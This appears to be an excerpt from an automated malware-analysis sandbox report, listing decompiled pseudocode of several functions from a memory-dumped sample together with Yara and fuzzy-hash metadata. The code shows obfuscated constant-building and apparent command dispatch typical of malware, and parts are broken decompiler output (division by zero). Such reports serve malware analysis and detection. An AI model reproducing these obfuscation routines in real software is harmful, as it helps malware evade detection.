                                          0x006d10fa
                                          0x006d10fc
                                          0x006d1101
                                          0x006d1103
                                          0x00000000
                                          0x006d1103
                                          0x006d10c4
                                          0x006d10ca
                                          0x006d1157
                                          0x006d10cc
                                          0x006d10d2
                                          0x00000000
                                          0x006d10d4
                                          0x006d10d4
                                          0x00000000
                                          0x006d10d4
                                          0x006d10d2
                                          0x006d10ca
                                          0x006d1160
                                          0x006d1167
                                          0x006d1167
                                          0x006d1113
                                          0x006d1114
                                          0x006d111d
                                          0x006d1123
                                          0x006d112c
                                          0x00000000
                                          0x006d1125
                                          0x006d1125
                                          0x00000000
                                          0x006d1125
                                          0x00000000
                                          0x006d1131
                                          0x006d1131
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 54c5c56bf0af8cda16f7e28256bcac62e124157df4d0d3f995edbfb0d9cf3b88
                                          • Instruction ID: 4647f6a6ecc69c7b9de4a65c37e4de3bf81da20ad6a306be82e5ffb4466ca8a3
                                          • Opcode Fuzzy Hash: 54c5c56bf0af8cda16f7e28256bcac62e124157df4d0d3f995edbfb0d9cf3b88
                                          • Instruction Fuzzy Hash: 44617C72D01309EBDF14CFA5DD859EEBBB2FF48324F248219E512B6290D7B54A418F90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006CF444, Relevance: .1, Instructions: 128COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 98%
                                          			E006CF444(signed int __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				void* _t120;
				signed int _t126;
				signed int _t128;
				signed int _t129;
				signed int _t130;
				signed int _t131;
				intOrPtr* _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				void* _t159;
				void* _t160;

				_t128 = __ecx;
				_t152 =  *0x6dca24; // 0x0
				while(_t152 != 0) {
					if( *((intOrPtr*)(_t152 + 0x28)) != 0) {
						 *((intOrPtr*)(_t152 + 4))( *((intOrPtr*)(_t152 + 0x28)), 0xb, 0);
					}
					_t152 =  *((intOrPtr*)(_t152 + 0x2c));
				}
				_t129 = _t128 | 0xffffffff;
				_pop(_t153);
				_t160 = _t159 - 0x2c;
				_v8 = 0xa05a;
				_v8 = _v8 | 0x4de4d3b6;
				_t126 = _t129;
				_t149 = 0x6dca24;
				_t130 = 0x77;
				_v8 = _v8 / _t130;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 ^ 0x000036e5;
				_v44 = 0x8c67;
				_t131 = 0x67;
				_v44 = _v44 * 0x22;
				_v44 = _v44 ^ 0x00129d81;
				_v24 = 0xef;
				_v24 = _v24 + 0xffff82ae;
				_v24 = _v24 >> 4;
				_v24 = _v24 ^ 0x0fffc315;
				_v12 = 0xac64;
				_v12 = _v12 >> 6;
				_v12 = _v12 / _t131;
				_v12 = _v12 ^ 0x56eede11;
				_v12 = _v12 ^ 0x56ee9803;
				_v32 = 0x5470;
				_v32 = _v32 >> 1;
				_v32 = _v32 << 7;
				_v32 = _v32 ^ 0x00150b15;
				_v36 = 0xc745;
				_v36 = _v36 >> 0xb;
				_v36 = _v36 >> 8;
				_v36 = _v36 ^ 0x00006261;
				_v16 = 0x5384;
				_v16 = _v16 | 0x59782290;
				_v16 = _v16 << 2;
				_v16 = _v16 + 0xffff2741;
				_v16 = _v16 ^ 0x65e0bd40;
				_v20 = 0x334d;
				_v20 = _v20 | 0xb04f2549;
				_v20 = _v20 + 0xf20e;
				_v20 = _v20 + 0x9932;
				_v20 = _v20 ^ 0xb050c5c9;
				_v40 = 0xe415;
				_v40 = _v40 * 0x55;
				_v40 = _v40 + 0x2e22;
				_v40 = _v40 ^ 0x004bf03f;
				_v48 = 0x3d8d;
				_v48 = _v48 << 1;
				_v48 = _v48 ^ 0x00006d20;
				_v28 = 0x48e5;
				_v28 = _v28 << 3;
				_v28 = _v28 << 0xe;
				_v28 = _v28 ^ 0x91ca0000;
				_t154 =  *0x6dca24; // 0x0
				while(_t154 != 0) {
					if( *((intOrPtr*)(_t154 + 0x28)) == 0) {
						L10:
						 *_t149 =  *((intOrPtr*)(_t154 + 0x2c));
						_t120 = E006CF536(_v20, _v40, _v48, _t154);
					} else {
						_t120 = E006D086F(_v8, _v44,  *((intOrPtr*)(_t154 + 0x1c)), _t126, _v24);
						_t160 = _t160 + 0xc;
						if(_t120 != _v28) {
							_t112 = _t154 + 0x2c; // 0x2c
							_t149 = _t112;
						} else {
							 *((intOrPtr*)(_t154 + 4))( *((intOrPtr*)(_t154 + 0x28)), 0, 0);
							E006D422C(_v12,  *((intOrPtr*)(_t154 + 0x28)), _v32);
							E006D4F7D(_v36, _v16,  *((intOrPtr*)(_t154 + 0x1c)));
							goto L10;
						}
					}
					_t154 =  *_t149;
				}
				return _t120;
			}

























                                          0x006cf444
                                          0x006cf445
                                          0x006cf460
                                          0x006cf451
                                          0x006cf45a
                                          0x006cf45a
                                          0x006cf45d
                                          0x006cf45d
                                          0x006cf464
                                          0x006cf467
                                          0x006d98a6
                                          0x006d98a9
                                          0x006d98b2
                                          0x006d98c1
                                          0x006d98c3
                                          0x006d98c8
                                          0x006d98cd
                                          0x006d98d2
                                          0x006d98d6
                                          0x006d98dd
                                          0x006d98e8
                                          0x006d98e9
                                          0x006d98ec
                                          0x006d98f3
                                          0x006d98fa
                                          0x006d9901
                                          0x006d9905
                                          0x006d990c
                                          0x006d9913
                                          0x006d991c
                                          0x006d991f
                                          0x006d9926
                                          0x006d992d
                                          0x006d9934
                                          0x006d9937
                                          0x006d993b
                                          0x006d9942
                                          0x006d9949
                                          0x006d994d
                                          0x006d9951
                                          0x006d9958
                                          0x006d995f
                                          0x006d9966
                                          0x006d996a
                                          0x006d9971
                                          0x006d9978
                                          0x006d997f
                                          0x006d9986
                                          0x006d998d
                                          0x006d9994
                                          0x006d999b
                                          0x006d99a6
                                          0x006d99a9
                                          0x006d99b0
                                          0x006d99b7
                                          0x006d99be
                                          0x006d99c1
                                          0x006d99c8
                                          0x006d99cf
                                          0x006d99d3
                                          0x006d99d7
                                          0x006d99de
                                          0x006d9a46
                                          0x006d99ea
                                          0x006d9a2e
                                          0x006d9a3b
                                          0x006d9a3d
                                          0x006d99ec
                                          0x006d99f9
                                          0x006d99fe
                                          0x006d9a04
                                          0x006d9a51
                                          0x006d9a51
                                          0x006d9a06
                                          0x006d9a0d
                                          0x006d9a19
                                          0x006d9a27
                                          0x00000000
                                          0x006d9a2d
                                          0x006d9a04
                                          0x006d9a44
                                          0x006d9a44
                                          0x006d9a50

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3f6fcbfd5261f3a299c14bf80797ff3f12eb9b0798c91cd1b17479c38f04f41a
                                          • Instruction ID: f752a57cdc6611a19d9e8ad4ad4acdd1cf0a3eade9f917ebc28231f864c1e8e0
                                          • Opcode Fuzzy Hash: 3f6fcbfd5261f3a299c14bf80797ff3f12eb9b0798c91cd1b17479c38f04f41a
                                          • Instruction Fuzzy Hash: AB514532D00709DBDB18CFA5D94AAEEFBB2FB08314F208159D516762A0C7B46A45CF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006D71EF, Relevance: .1, Instructions: 123COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 96%
                                          			E006D71EF(void* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v68;
				char _v144;
				void* __ecx;
				void* _t94;
				void* _t106;
				void* _t108;
				void* _t110;
				void* _t112;
				void* _t114;
				signed int _t120;
				void* _t142;
				void* _t144;
				void* _t146;
				void* _t147;

				_t147 = __eflags;
				_push(_a4);
				_push(__edx);
				E006C602B(_t94);
				_v20 = 0xa5d0;
				_v20 = _v20 | 0x3487ecbd;
				_v20 = _v20 + 0xffff03d0;
				_t142 = 0;
				_v20 = _v20 + 0x3a47;
				_v20 = _v20 ^ 0x348731c7;
				_v28 = 0xdd31;
				_v28 = _v28 << 0x10;
				_v28 = _v28 | 0x8f0862d8;
				_v28 = _v28 ^ 0xdf391de9;
				_v16 = 0xb0e;
				_v16 = _v16 << 4;
				_v16 = _v16 << 0xa;
				_t120 = 0x14;
				_v16 = _v16 * 0x76;
				_v16 = _v16 ^ 0x461d447c;
				_v12 = 0xa74;
				_v12 = _v12 << 0xc;
				_v12 = _v12 + 0x835b;
				_v12 = _v12 >> 1;
				_v12 = _v12 ^ 0x0053bc14;
				_v36 = 0xa6cf;
				_v36 = _v36 << 1;
				_v36 = _v36 ^ 0x000104b7;
				_v24 = 0x4d22;
				_v24 = _v24 >> 6;
				_v24 = _v24 + 0xef2f;
				_v24 = _v24 ^ 0x0000ed15;
				_v44 = 0x3931;
				_v44 = _v44 * 0x11;
				_v44 = _v44 ^ 0x00039362;
				_v40 = 0xec47;
				_v40 = _v40 ^ 0x28f00c99;
				_v40 = _v40 ^ 0x28f09017;
				_v32 = 0x2800;
				_v32 = _v32 / _t120;
				_v32 = _v32 ^ 0x971b94ed;
				_v32 = _v32 ^ 0x971b9d0a;
				E006D50F2( &_v144, _v20, _v28, _v16, __edx);
				_t146 = _t144 + 0x18;
				L13:
				if(E006CB055(_v12, _v36, _t147,  &_v144,  &_v68) != 0) {
					_t106 = E006C1280(_v24, _v44, _v40,  &_v60,  &_v68, _v32);
					_t146 = _t146 + 0x10;
					__eflags = _t106;
					if(__eflags != 0) {
						_t108 = _v56 - 1;
						__eflags = _t108;
						if(_t108 == 0) {
							E006C6754(_v60,  &_v52);
						} else {
							_t110 = _t108 - 1;
							__eflags = _t110;
							if(_t110 == 0) {
								E006C8F78(_v60,  &_v52);
							} else {
								_t112 = _t110 - 1;
								__eflags = _t112;
								if(_t112 == 0) {
									E006D26F5(_v60,  &_v52);
								} else {
									_t114 = _t112 - 1;
									__eflags = _t114;
									if(_t114 == 0) {
										E006C4A35(_v60,  &_v52);
									} else {
										__eflags = _t114 == 6;
										if(_t114 == 6) {
											E006C69A0(_v60,  &_v52);
										}
									}
								}
							}
						}
						_t142 = _t142 + 1;
						__eflags = _t142;
					}
					goto L13;
				}
				return _t142;
			}





























                                          0x006d71ef
                                          0x006d71fa
                                          0x006d71ff
                                          0x006d7201
                                          0x006d7206
                                          0x006d7210
                                          0x006d7219
                                          0x006d7220
                                          0x006d7222
                                          0x006d7229
                                          0x006d7230
                                          0x006d7237
                                          0x006d723b
                                          0x006d7242
                                          0x006d7249
                                          0x006d7250
                                          0x006d7254
                                          0x006d725e
                                          0x006d7260
                                          0x006d7263
                                          0x006d726a
                                          0x006d7271
                                          0x006d7275
                                          0x006d727c
                                          0x006d727f
                                          0x006d7286
                                          0x006d728d
                                          0x006d7290
                                          0x006d7297
                                          0x006d729e
                                          0x006d72a2
                                          0x006d72a9
                                          0x006d72b0
                                          0x006d72bb
                                          0x006d72be
                                          0x006d72c5
                                          0x006d72cc
                                          0x006d72d3
                                          0x006d72da
                                          0x006d72ec
                                          0x006d72ef
                                          0x006d72f6
                                          0x006d7306
                                          0x006d730b
                                          0x006d7384
                                          0x006d739e
                                          0x006d7324
                                          0x006d7329
                                          0x006d732c
                                          0x006d732e
                                          0x006d7333
                                          0x006d7333
                                          0x006d7334
                                          0x006d737e
                                          0x006d7336
                                          0x006d7336
                                          0x006d7336
                                          0x006d7337
                                          0x006d7371
                                          0x006d7339
                                          0x006d7339
                                          0x006d7339
                                          0x006d733a
                                          0x006d7364
                                          0x006d733c
                                          0x006d733c
                                          0x006d733c
                                          0x006d733d
                                          0x006d7357
                                          0x006d733f
                                          0x006d733f
                                          0x006d7342
                                          0x006d734a
                                          0x006d734a
                                          0x006d7342
                                          0x006d733d
                                          0x006d733a
                                          0x006d7337
                                          0x006d7383
                                          0x006d7383
                                          0x006d7383
                                          0x00000000
                                          0x006d732e
                                          0x006d73ab

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9e60bb529e95b2fd998923d9e3cb4c74cf202ff18c9249fb7b0ce3a5257b475f
                                          • Instruction ID: 9a33d85994f8d1a9d5f336c97929db9e89419da6d911d50a2e45df3757e419d4
                                          • Opcode Fuzzy Hash: 9e60bb529e95b2fd998923d9e3cb4c74cf202ff18c9249fb7b0ce3a5257b475f
                                          • Instruction Fuzzy Hash: 12514971D0420EABDF08CFA0D8459EEBBB6FF44304F10815AD411B7290E7B85A49CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006D8ADC, Relevance: .1, Instructions: 114COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 96%
                                          			E006D8ADC(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v304;
				char _t109;
				void* _t115;
				signed int _t117;
				signed int _t118;
				signed int _t119;
				char* _t120;
				intOrPtr* _t139;
				void* _t140;

				_v44 = 0xbe2c;
				_v44 = _v44 | 0x84c59b93;
				_v44 = _v44 ^ 0x84c5dc14;
				_v12 = 0x6fb6;
				_v12 = _v12 << 0xc;
				_t139 = __ecx;
				_t117 = 0x2e;
				_v12 = _v12 / _t117;
				_v12 = _v12 + 0xcda3;
				_v12 = _v12 ^ 0x0027e688;
				_v28 = 0xcabb;
				_v28 = _v28 + 0xd310;
				_v28 = _v28 | 0x3c203c9f;
				_v28 = _v28 ^ 0x3c2189d4;
				_v36 = 0x4eab;
				_v36 = _v36 | 0x84b19700;
				_v36 = _v36 ^ 0x84b1b180;
				_v8 = 0xd8ee;
				_v8 = _v8 + 0xffff63d4;
				_v8 = _v8 ^ 0xfc264e39;
				_v8 = _v8 ^ 0x6fc556fb;
				_v8 = _v8 ^ 0x93e330d5;
				_v20 = 0x5c82;
				_v20 = _v20 | 0x7a047e0a;
				_v20 = _v20 << 5;
				_t118 = 0x1b;
				_v20 = _v20 * 0x43;
				_v20 = _v20 ^ 0xe5a3df6f;
				_v40 = 0x7499;
				_v40 = _v40 >> 8;
				_v40 = _v40 ^ 0x0000130c;
				_v16 = 0x5702;
				_v16 = _v16 << 8;
				_v16 = _v16 << 6;
				_v16 = _v16 + 0xffffa72f;
				_v16 = _v16 ^ 0x15c040b7;
				_v32 = 0x67e1;
				_v32 = _v32 / _t118;
				_v32 = _v32 ^ 0x8e6cf5d6;
				_v32 = _v32 ^ 0x8e6ccf96;
				_v24 = 0x77;
				_t119 = 0x69;
				_v24 = _v24 * 0x25;
				_t120 =  &_v304;
				_v24 = _v24 / _t119;
				_v24 = _v24 ^ 0x863bea64;
				_v24 = _v24 ^ 0x863bfaf8;
				while(1) {
					_t109 =  *_t139;
					if(_t109 == 0) {
						break;
					}
					if(_t109 == 0x2e) {
						 *_t120 = 0;
					} else {
						 *_t120 = _t109;
						_t120 = _t120 + 1;
						_t139 = _t139 + 1;
						continue;
					}
					L6:
					_t140 = E006CF22A(_v44, _v12,  &_v304, _v28);
					if(_t140 != 0) {
						L8:
						_push(E006D8634(_v40, _t139 + 1, _v16) ^ 0x762b677b);
						_push(_t140);
						return E006D0126(_v32, _v24);
					}
					_t115 = E006D4AAF( &_v304, _v36, _v8, _v20);
					_t140 = _t115;
					if(_t140 != 0) {
						goto L8;
					}
					return _t115;
				}
				goto L6;
			}






















                                          0x006d8ae5
                                          0x006d8aee
                                          0x006d8af5
                                          0x006d8afc
                                          0x006d8b03
                                          0x006d8b0e
                                          0x006d8b10
                                          0x006d8b15
                                          0x006d8b1a
                                          0x006d8b21
                                          0x006d8b28
                                          0x006d8b2f
                                          0x006d8b36
                                          0x006d8b3d
                                          0x006d8b44
                                          0x006d8b4b
                                          0x006d8b52
                                          0x006d8b59
                                          0x006d8b60
                                          0x006d8b67
                                          0x006d8b6e
                                          0x006d8b75
                                          0x006d8b7c
                                          0x006d8b83
                                          0x006d8b8a
                                          0x006d8b92
                                          0x006d8b95
                                          0x006d8b98
                                          0x006d8b9f
                                          0x006d8ba6
                                          0x006d8baa
                                          0x006d8bb1
                                          0x006d8bb8
                                          0x006d8bbc
                                          0x006d8bc0
                                          0x006d8bc7
                                          0x006d8bce
                                          0x006d8bdc
                                          0x006d8bdf
                                          0x006d8be6
                                          0x006d8bed
                                          0x006d8bf8
                                          0x006d8bf9
                                          0x006d8c01
                                          0x006d8c07
                                          0x006d8c0a
                                          0x006d8c11
                                          0x006d8c22
                                          0x006d8c22
                                          0x006d8c26
                                          0x00000000
                                          0x00000000
                                          0x006d8c1c
                                          0x006d8c2a
                                          0x006d8c1e
                                          0x006d8c1e
                                          0x006d8c20
                                          0x006d8c21
                                          0x00000000
                                          0x006d8c21
                                          0x006d8c2d
                                          0x006d8c42
                                          0x006d8c48
                                          0x006d8c66
                                          0x006d8c7f
                                          0x006d8c80
                                          0x00000000
                                          0x006d8c86
                                          0x006d8c59
                                          0x006d8c5e
                                          0x006d8c64
                                          0x00000000
                                          0x00000000
                                          0x006d8c8e
                                          0x006d8c8e
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 94b0c3d6e61e61ea0f224150d988a8d30d783f5daa19532cd6a56022687b62a3
                                          • Instruction ID: 04131d6f52434e2755b9ca244264e18609d9f21dc8a1f44ce95f7d4b1af493c7
                                          • Opcode Fuzzy Hash: 94b0c3d6e61e61ea0f224150d988a8d30d783f5daa19532cd6a56022687b62a3
                                          • Instruction Fuzzy Hash: 09513371C0121ADFDF59CFA0D94A9EEBBB2FB44314F20819AC111B62A0D7B91B45CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006C48BD, Relevance: .1, Instructions: 107COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 89%
                                          			E006C48BD(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _t84;
				intOrPtr* _t95;
				signed int _t103;
				signed int _t104;
				void* _t105;
				signed int _t108;
				void* _t122;

				_t122 = __ecx;
				_push(0x6dc110);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006C602B(_t84);
				_v48 = 0x61abc6;
				_v44 = 0;
				_v40 = 0;
				_v20 = 0x3115;
				_v20 = _v20 >> 0xf;
				_v20 = _v20 >> 0xb;
				_v20 = _v20 ^ 0x0000604b;
				_v16 = 0xb2e9;
				_v16 = _v16 >> 0xf;
				_v16 = _v16 + 0x4f02;
				_v16 = _v16 ^ 0x00000d08;
				_v8 = 0x47ff;
				_v8 = _v8 + 0xba3e;
				_t103 = 0x68;
				_v8 = _v8 / _t103;
				_t104 = 0x36;
				_v8 = _v8 * 0x26;
				_v8 = _v8 ^ 0x00006b48;
				_v12 = 0x7283;
				_v12 = _v12 + 0xffffff70;
				_v12 = _v12 >> 5;
				_v12 = _v12 | 0x62bbfeca;
				_v12 = _v12 ^ 0x62bbef9f;
				_v32 = 0x955e;
				_v32 = _v32 + 0x386b;
				_v32 = _v32 ^ 0x0000cdee;
				_v36 = 0x2587;
				_v36 = _v36 ^ 0xc63d9950;
				_v36 = _v36 ^ 0xc63dc5f3;
				_v28 = 0xb9df;
				_v28 = _v28 ^ 0xf1a14283;
				_v28 = _v28 * 0x63;
				_v28 = _v28 ^ 0x71a43d80;
				_v24 = 0x4453;
				_v24 = _v24 << 3;
				_t105 = 0x4c;
				_v24 = _v24 / _t104;
				_v24 = _v24 ^ 0x00004bab;
				_t95 = E006C8736(_t105);
				 *0x6dca38 = _t95;
				if(_t95 == 0) {
					L7:
					return 0;
				}
				_t108 =  *(_t95 + 0x3c);
				 *((intOrPtr*)(_t95 + 0x14)) = 0x6dc110;
				 *_t95 = 0x6dc110;
				 *((intOrPtr*)(_t95 + 0x24)) = 0;
				while( *((intOrPtr*)(0x6dc110 + _t108 * 8)) != 0) {
					_t108 = _t108 + 1;
					 *(_t95 + 0x3c) = _t108;
				}
				if(E006C1CFA(_v32, _t122) == 0) {
					E006CF536(_v36, _v28, _v24,  *0x6dca38);
					goto L7;
				}
				return 1;
			}





















                                          0x006c48cb
                                          0x006c48cd
                                          0x006c48ce
                                          0x006c48d1
                                          0x006c48d4
                                          0x006c48d5
                                          0x006c48d6
                                          0x006c48db
                                          0x006c48e4
                                          0x006c48e9
                                          0x006c48ec
                                          0x006c48f3
                                          0x006c48f7
                                          0x006c48fb
                                          0x006c4902
                                          0x006c4909
                                          0x006c490d
                                          0x006c4914
                                          0x006c491b
                                          0x006c4922
                                          0x006c492e
                                          0x006c4933
                                          0x006c493c
                                          0x006c4940
                                          0x006c4943
                                          0x006c494a
                                          0x006c4951
                                          0x006c4958
                                          0x006c495c
                                          0x006c4963
                                          0x006c496a
                                          0x006c4971
                                          0x006c4978
                                          0x006c497f
                                          0x006c4986
                                          0x006c498d
                                          0x006c4994
                                          0x006c499b
                                          0x006c49a8
                                          0x006c49ab
                                          0x006c49b2
                                          0x006c49b9
                                          0x006c49c2
                                          0x006c49c3
                                          0x006c49c6
                                          0x006c49d6
                                          0x006c49db
                                          0x006c49e4
                                          0x006c4a2c
                                          0x00000000
                                          0x006c4a2c
                                          0x006c49e6
                                          0x006c49e9
                                          0x006c49ec
                                          0x006c49ee
                                          0x006c49f7
                                          0x006c49f3
                                          0x006c49f4
                                          0x006c49f4
                                          0x006c4a0f
                                          0x006c4a25
                                          0x00000000
                                          0x006c4a2b
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 94c0028e89007bbfaedefc939d012d576b0ab8f6bcd01f6b226db4e7db1190e7
                                          • Instruction ID: 3b7e6d87bb6f2ec2800910cbf30ccbb21899a38cedd5f39882625bd949431a72
                                          • Opcode Fuzzy Hash: 94c0028e89007bbfaedefc939d012d576b0ab8f6bcd01f6b226db4e7db1190e7
                                          • Instruction Fuzzy Hash: 03414871D0120AAFDB44CFA5D9569EEBBB6FF44314F20805ED101AA290DBB44A45CF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006D67E9, Relevance: .1, Instructions: 78COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 96%
                                          			E006D67E9() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				void* _t116;
				intOrPtr* _t143;
				intOrPtr _t146;
				void* _t151;
				void* _t152;

				_t152 = _t151 - 0x2c;
				_v8 = 0xa05a;
				_v8 = _v8 | 0x4de4d3b6;
				_push(0x77);
				_t143 = 0x6dca24;
				_push(0x67);
				_v8 = _v8 / 0;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 ^ 0x000036e5;
				_v44 = 0x8c67;
				_v44 = _v44 * 0x22;
				_v44 = _v44 ^ 0x00129d81;
				_v24 = 0xef;
				_v24 = _v24 + 0xffff82ae;
				_v24 = _v24 >> 4;
				_v24 = _v24 ^ 0x0fffc315;
				_v12 = 0xac64;
				_v12 = _v12 >> 6;
				_v12 = _v12 / 0;
				_v12 = _v12 ^ 0x56eede11;
				_v12 = _v12 ^ 0x56ee9803;
				_v32 = 0x5470;
				_v32 = _v32 >> 1;
				_v32 = _v32 << 7;
				_v32 = _v32 ^ 0x00150b15;
				_v36 = 0xc745;
				_v36 = _v36 >> 0xb;
				_v36 = _v36 >> 8;
				_v36 = _v36 ^ 0x00006261;
				_v16 = 0x5384;
				_v16 = _v16 | 0x59782290;
				_v16 = _v16 << 2;
				_v16 = _v16 + 0xffff2741;
				_v16 = _v16 ^ 0x65e0bd40;
				_v20 = 0x334d;
				_v20 = _v20 | 0xb04f2549;
				_v20 = _v20 + 0xf20e;
				_v20 = _v20 + 0x9932;
				_v20 = _v20 ^ 0xb050c5c9;
				_v40 = 0xe415;
				_v40 = _v40 * 0x55;
				_v40 = _v40 + 0x2e22;
				_v40 = _v40 ^ 0x004bf03f;
				_v48 = 0x3d8d;
				_v48 = _v48 << 1;
				_v48 = _v48 ^ 0x00006d20;
				_v28 = 0x48e5;
				_v28 = _v28 << 3;
				_v28 = _v28 << 0xe;
				_v28 = _v28 ^ 0x91ca0000;
				_t146 =  *0x6dca24; // 0x0
				while(_t146 != 0) {
					if( *((intOrPtr*)(_t146 + 0x28)) == 0) {
						L5:
						 *_t143 =  *((intOrPtr*)(_t146 + 0x2c));
						_t116 = E006CF536(_v20, _v40, _v48, _t146);
					} else {
						_t116 = E006D086F(_v8, _v44,  *((intOrPtr*)(_t146 + 0x1c)), 0, _v24);
						_t152 = _t152 + 0xc;
						if(_t116 != _v28) {
							_t108 = _t146 + 0x2c; // 0x2c
							_t143 = _t108;
						} else {
							 *((intOrPtr*)(_t146 + 4))( *((intOrPtr*)(_t146 + 0x28)), 0, 0);
							E006D422C(_v12,  *((intOrPtr*)(_t146 + 0x28)), _v32);
							E006D4F7D(_v36, _v16,  *((intOrPtr*)(_t146 + 0x1c)));
							goto L5;
						}
					}
					_t146 =  *_t143;
				}
				return _t116;
			}



















                                          0x006d98a6
                                          0x006d98a9
                                          0x006d98b2
                                          0x006d98bf
                                          0x006d98c3
                                          0x006d98cb
                                          0x006d98cd
                                          0x006d98d2
                                          0x006d98d6
                                          0x006d98dd
                                          0x006d98e9
                                          0x006d98ec
                                          0x006d98f3
                                          0x006d98fa
                                          0x006d9901
                                          0x006d9905
                                          0x006d990c
                                          0x006d9913
                                          0x006d991c
                                          0x006d991f
                                          0x006d9926
                                          0x006d992d
                                          0x006d9934
                                          0x006d9937
                                          0x006d993b
                                          0x006d9942
                                          0x006d9949
                                          0x006d994d
                                          0x006d9951
                                          0x006d9958
                                          0x006d995f
                                          0x006d9966
                                          0x006d996a
                                          0x006d9971
                                          0x006d9978
                                          0x006d997f
                                          0x006d9986
                                          0x006d998d
                                          0x006d9994
                                          0x006d999b
                                          0x006d99a6
                                          0x006d99a9
                                          0x006d99b0
                                          0x006d99b7
                                          0x006d99be
                                          0x006d99c1
                                          0x006d99c8
                                          0x006d99cf
                                          0x006d99d3
                                          0x006d99d7
                                          0x006d99de
                                          0x006d9a46
                                          0x006d99ea
                                          0x006d9a2e
                                          0x006d9a3b
                                          0x006d9a3d
                                          0x006d99ec
                                          0x006d99f9
                                          0x006d99fe
                                          0x006d9a04
                                          0x006d9a51
                                          0x006d9a51
                                          0x006d9a06
                                          0x006d9a0d
                                          0x006d9a19
                                          0x006d9a27
                                          0x00000000
                                          0x006d9a2d
                                          0x006d9a04
                                          0x006d9a44
                                          0x006d9a44
                                          0x006d9a50

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ff905d0bc7d17e3ac5ce7355f4c6c0575f8aa6b597b35d68a6b14d3430bb42a7
                                          • Instruction ID: 346812923add76c724eb32969ba5634b7d3891c16112b81b7c5e412f4d8e2b5b
                                          • Opcode Fuzzy Hash: ff905d0bc7d17e3ac5ce7355f4c6c0575f8aa6b597b35d68a6b14d3430bb42a7
                                          • Instruction Fuzzy Hash: 16410172D0131EDBDB48CFA5D58A4DEFBB1BB14758F208059C115BA290C7B80B49CFA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

